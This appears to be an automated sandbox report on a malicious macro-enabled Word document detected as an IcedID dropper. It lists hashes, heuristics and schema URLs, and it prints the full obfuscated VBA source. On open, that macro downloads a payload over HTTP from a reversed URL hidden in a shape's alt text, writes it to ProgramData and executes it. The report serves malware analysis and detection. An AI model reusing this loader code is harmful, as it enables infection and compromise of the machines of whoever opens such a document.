Office (OOXML) malware analysis — malicious · 93cdd672ed8467e9

MALICIOUS

Office (OOXML)

141.4 KB Created: 2020-10-13 10:52:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: 5b9ec41dea18050cbc9713da2e0f959c SHA-1: a3dcf3229700b05c9cfdbe8bdc713f289e0ac7b3 SHA-256: 93cdd672ed8467e9241e5a942a5ebb0b594a0b39b14551d4f22ea556fb9b9c00

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set rGUXi = CreateObject("Script" + hjUlx)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12472 bytes
SHA-256: `55146e83de5d17bd7d178b1422e15a8be51e1307c6e85b91a91944d5f2c05b95`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "pkXkO" Sub UMSdl(QWQBC, Optional ByVal BfQKa As String = "c:\programdata\qteNy.txt", Optional ByVal hjUlx As String = "ing.FileSystemObject") ' Wallchart selfdestruct jawbones ' Encumbrances satanically telescoping ' Contests forbore pottered frumpy ' Supremacist whirred villas adapts prolix ' Waywardly knot ' Kindred ' Businessmen limitation merging bladed empathise favoured ' Foliated collectively ' Sensation backpacking pointedness bundling discords abbot injunction ' Indexer ' Soot footstool constriction devouring snouts ' Emphasising tobacconists centralist ' Belittle killjoys heresy chronologically ' Criminalised blesbok ' Arabesque wallets homologues photons ' Alabaster onagers actuaries reaffirm ' Modifiers overthrow ' Gloated idolise touch move tracery ' Troughs slacks ' Sojourn meringues fashioned crofting waist Set rGUXi = CreateObject("Script" + hjUlx) ' Commandant punning permeated ' Progressiveness loudspeaker havana papacy ' Lateral zombi ' Floras ' Facilitation redoubled marshiest captions ' Ungenerous coextensive gainly joys ' Wended pinkies Set gOtsG = rGUXi.CreateTextFile(BfQKa) ' Witchdoctors enzyme inexpensive syllable ' Hamburg sharpener coffee witchlike ' Attractors wisps coronation welt premiss marshaller agitatedly ' Complementary cams ' Apoplectic allured foolishness drawling busker ideology ' Tightness strangled idealist gOtsG.WriteLine QWQBC ' Underpass splices craftsmen ' Upholding inflating ' Boozer ' Recollected waterproofing resuscitation undergrowth ' Fibres interjects luminescent institution peacock ' Derails tapped evasions pulping gOtsG.Close ' Grizzled wickerwork ' Arthropods consciencestricken reactivating ' Skulk obnoxious implicates warbles replenish ' Try ' Vending ' Developed transcendental ' Arbitrates incapable bassoon ' Twin ' Family repository ' Hearkening implemented raillery vilification threshed ' Sibilant positrons ' Racket summarily ' Breakthrough gratifications chattel authenticity housebound ' Prophesied crucifix curlicues ' Vesting cooled ' Employ bedstead paraplegic ' Clotted ' Stagnant spastics snob cannes westerners plushy ' Bullfighting debilitate misjudge indiscipline mused ' Jackdaws desiccator deciding bedsores unmistakably floreat windfall ' Embrasure foghorn fluxes ' Recollects charter radiate situations ' Lynchpin lasing ' Feds ' Plateaux limbo weaselly feedstock ulcerations ' Producer semblances role ' Prosaically disappoint irascibly ' Linking acreage reanimated ' Omnibus breeder outdoor ' Vats inadvisability ' Reoccur cameramen ravages elbowed ' Mess decapitated ' Pernicious distrustful circumnavigates ' Brown ' Bossing embraced ' Canvas gyrations ' Pragmatists diabetics ' Mortise misfiled ' Premature mourned laps End Sub ' Armlets mirrored ' Iraqi ascertain ' Disobeying recursively quaff ' Expandable nicknames orthonormal sputniks ' Defectors nunnery separates microscopist odds Sub AutoOpen() ' Minutely unmeasurable liberal buyer brainy ' Meadow nightdresses annotation ' Effectively thrush ' Ripened gravedigger nobleman wantonness ' Clump beta nameplates spaded unsettling districts ' Eritrea entreated ' Mildmannered quaintly ' Armourers harpists ' Languorous duels sippers unseasonal coverlet ' Drinkers registries spinster ' Bathurst ' Toss allusion addles sanctifies ' Exhausts agonisingly ' Overlook hollowly preciousness compromises ' Pizzicato skyscape ' Murderous sincerely climate import ' Publication nicest impiety ' Lively theoretically pivots ' Prostrate splitters hangman becks reclassifying pele ' Egged skyscraper elevators restore ' Rasps inanely ' Endurable Dim UfEXS As New agYHw ' Deride brown oscillated airwaves hydrolysis solitary ' Powerhouses oxidising cleared pettiest jellies megawatt ' Scrolled valhalla allegiances pollution revamps forester whelp ' Pervasiveness covariances slighter ' Complicity waited ears fathomless tremendous theorists QWQBC = UfEXS.usTTN("MSXML2.serverXMLHTTP") ' Gasping allowing vignettes obloquy undercarriage disquietude ' Toys blotch persuasions bookers ' Torsions hovel intervals lemons ' Tendering liquorish enforcer ' Travellers spreadsheets vizier chaperon ' Solve gastrointestinal inched UMSdl fRpuN(QWQBC) ' Zaps farflung thundered rarefaction ' Summoning scaffolds additions bloods heaters ' Fabricated trial ' Normalisers magnetodynamics patriotic appeases ' Infinite corroborating ' Damson exalt crashlanding likings disbeliever ' Funnelled firsts accusation ' Beatification amateurishly eluded tolls unaffordable ' Centrifuge relativist goalscorers ' Vividness readjusted immobilised ' Disposed nosiest ambulant oval nanosecond supermen ' Digitiser jarring infringes wcXTS zASTd(0) + "vr32 c:\programdata\qteNy.txt", "ws" End Sub Function MGcKG(SXTtQ, lMImn) ' Essayists people scar depress ' Samplings pebbly thoughtprovoking intifada redefined ' Inhomogeneities reddish lithosphere borrowed platforms ' Alkaloid basins MGcKG = Split(SXTtQ, lMImn) End Function Attribute VB_Name = "cILzf" ' Pizza weeks ' Speakers footgear ' Structure neaten luxuriance ' Feels steamier ' Associative clears potters Function fRpuN(aoIYb) ' Crotchet wont digestive geomagnetic skimming ' Geographic orating ' Overfeed hardly ' Pilfered unmasked cloaca petrochemicals ' Disputing unforgiven ' Newspaper ' Outraging deft buoyancy fRpuN = StrConv(aoIYb, vbUnicode) ' Determinant reckoned rookery underachievement ' Revolutionising venison amphitheatre ' Binomial undercover vibrators ' Implicit superstructure licences undergone teaser ' Deliverer happily triple revived ' Meriting malformations smear worshipful End Function ' Hearth isle magnetised superconductor fleecing ' Dads gloated parentinlaw conquest ' Durability ' Allocation scarifying ' Indicted Function oNXZc() ' Radiate lantern mnemonics ' Legibility slumps deliverable ' Hungers ' Harvest demystification marshmallow mourners sending brigadier ' Gems ' Interposition supercomputing quinine measureless ' Curving lighting escapade trachea partakes nocturne ' Torrents ' Impersonality deconstruct academia With ActiveDocument.shapes(1) oNXZc = .AlternativeText End With End Function ' Undetermined unconscionable grace gadgets swabs ' Omnidirectional trapeze aggression ' Sanctioning quoits lower ' Skippers depressing mellow gathering muster ' Combined fork grout gracefulness deliverance ' Objecting rematch downpour ' Handed messier paltrier Function zASTd(qUlNk) ' Sweethearts rigidifies ' Tamers humouring ' Quantum colloquialism haha reptilian behemoth ' Spaying ' Trick town porcelain capsize anticyclone antibiotics designations talk ' Slimmest disruptor ' Biblically ' Eviscerate girding ' Infusing scruple ' Comedown ' Attachment likeminded twisting bloc hut ' Exorbitantly undress blundered MSjRu = oNXZc() YKSVa = MGcKG(MSjRu, "###") PhAuG = YKSVa(qUlNk) zASTd = PhAuG End Function Attribute VB_Name = "agYHw" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Dallied gamesmen ' Flock overdetermined geocentric fitment unseeing ' Systemically ' Liquids stiffen ' Accusers align screechy thoughtless badgered topicality ' Overstress followings ' Ripstop religious constructional unethically formulates Function usTTN(GLwmJ) ' Flicks grinds ' Biophysical sluices trencher tenacious slugged ' Horrifically ' Absurd million ' Rattle retraces Dim BDOfU As Object ' Exemplars forested yews poorest dresses convoluted ' Digest propitiation concurrence destitute demarcation ' Digress judaism grouch vigils ' Ash bustled northwards marched broadcasters shibboleth fixtures ' Moveable twitchy depositing cramming forefathers droller ' Flickery rhino billowing stereographic ' Corresponding ' Crinkled sultans ' Jellify discontentedly preens ' Reminisces duck bedsheets ' Unselfishly speciation heaveho interlocks ' Infertility wold hardship ' Talismans wedging seamail Set BDOfU = CreateObject(GLwmJ) ' Recounting contemporaneity deceive vaccine ' Elector lichened invisibilities warns ' Unclassifiable wheel ' Pushing insufferable ' Definite animists artworks ' Stain bloodsuckers borders ' Ratlike sprite battlefield ' Splashed ' Unconvincingly sewerage ' Stellar outrage receivable sunspot telecoms ' Floorboard implementing alarm rudimentary stratifies barley ' Gladness unmounted gazette gesticulations ' Standardisations ' Sixty patients ' Tremor stylist forget holidaymaker overvalued cent ' Acoustically fission encapsulates ' Dainty leers ' Perseveres biding tweedy ureters ' Gaming gland touche filler ' Hitchhiking rectifies corrects beatitudes kilobits ' Tinkle jester restrains hubbies financing ' Maoist ' Variation conjurer actuation counterpointed photographically rczwE = zASTd(1) ' Muddier terrorism ' Weird accrediting enigmatically kampong ' Workings concatenating priestesses supercomputing ' Worktops polyunsaturated BDOfU.Open "GET", Reverse(rczwE), False ' Fly blackguard ' Nibblers stub parentheses ' Horde ' Unintuitive bangs paragliding ' Stricken heaths amendment ' Nugget dazzler standardisation anacondas BDOfU.Send ' Paean ' Document directives ' Trailing spayed glossaries mayoralty ' Dissenting convent ' Undeclared instructor unsettle usTTN = BDOfU.responsebody End Function Attribute VB_Name = "UpQZP" Sub wcXTS(KbCdK, ZJBHp) ' Aquatic duomo sociologists ' Batches hushes massing ' Indigestible anal paused ' Pennant greets scouting ' Fin upholstered ' Custard remixes engorged auroral ' Regales sonora paragraphing respectability rocked ' Chews tendentious Set mgkch = CreateObject(ZJBHp + "cript.shell") ' Redshift ' Clerical sedatives sided holistic ' Linearity sustenance tartans thespians ' Lore overrated ' Quotes mutts jackdaws craters renter radiantly vilify lack ' Magical knack blubbering sensible ' Exclusively computable incinerated conductance snippet urine ' Peanuts coercion ' Bob disaffiliated boozers termini rainbow ' Intertwine elliptic ' Chromatograph befall impious redecoration inscribed ' Forte err pedestrianised ' Scriptural shopkeeper aloud ' Mingle bellows baritones paints ' Killjoys unapologetic rummy disobedient ' Secretary invigilators ' Pots sunscreens industrialist ' Ridden uphold stringer ' Auroral backfired haddocks prioritises spanning reserve ' Redistributions overreaction vitiate topper outgo ' Dimorphic ' Chinless communicativeness ' Touchandgo pipeline smallholdings ' Shocking reviewable boasted ' Garters delineating consorted untutored sushis ' Backwaters retrievals ' Trainers everlasting promotable ' Pleasantries pounded pulsates ' Advocacy ' Costars graham ' Furs intrigues leghorn graced iconography maltreat ' Hallows teepee misspells ' Sheathing sparks rearrangement cubistic immanently drunk ' Ledges vassalage ' Coincides repudiation ' Whereabouts interviews mutinous distracts illfated ' Antigen reshuffled menstrual hotter lipid ' Pullover voidable conker bookstall ' Irretrievable modulate bazaar ' Spraining preschool burdock chutzpah freezer potentiality ' Croquet designated ' Frying individualist affairs ' Objectionable physiotherapists annuls blackbirds ' Yeas slacker ' Glasses ' Interbreeding loanable mystified ' Unpoetical grassed respond spectroscopes shammed ' Recognisers foam ' Demonstrably medleys ' Admonitions crumbling crusades freeing ' Terrorised ' Toenails sanctified fixer anticipated mgkch.exec KbCdK ' Excellence devilishly cytology ' Oblongs whereon fang ' Allowance ' Lux End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	45568 bytes
SHA-256: `36b96e129aa4f402b848b9930f473aab96a91584a19f8d9dbbb30be1b1be02ba`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.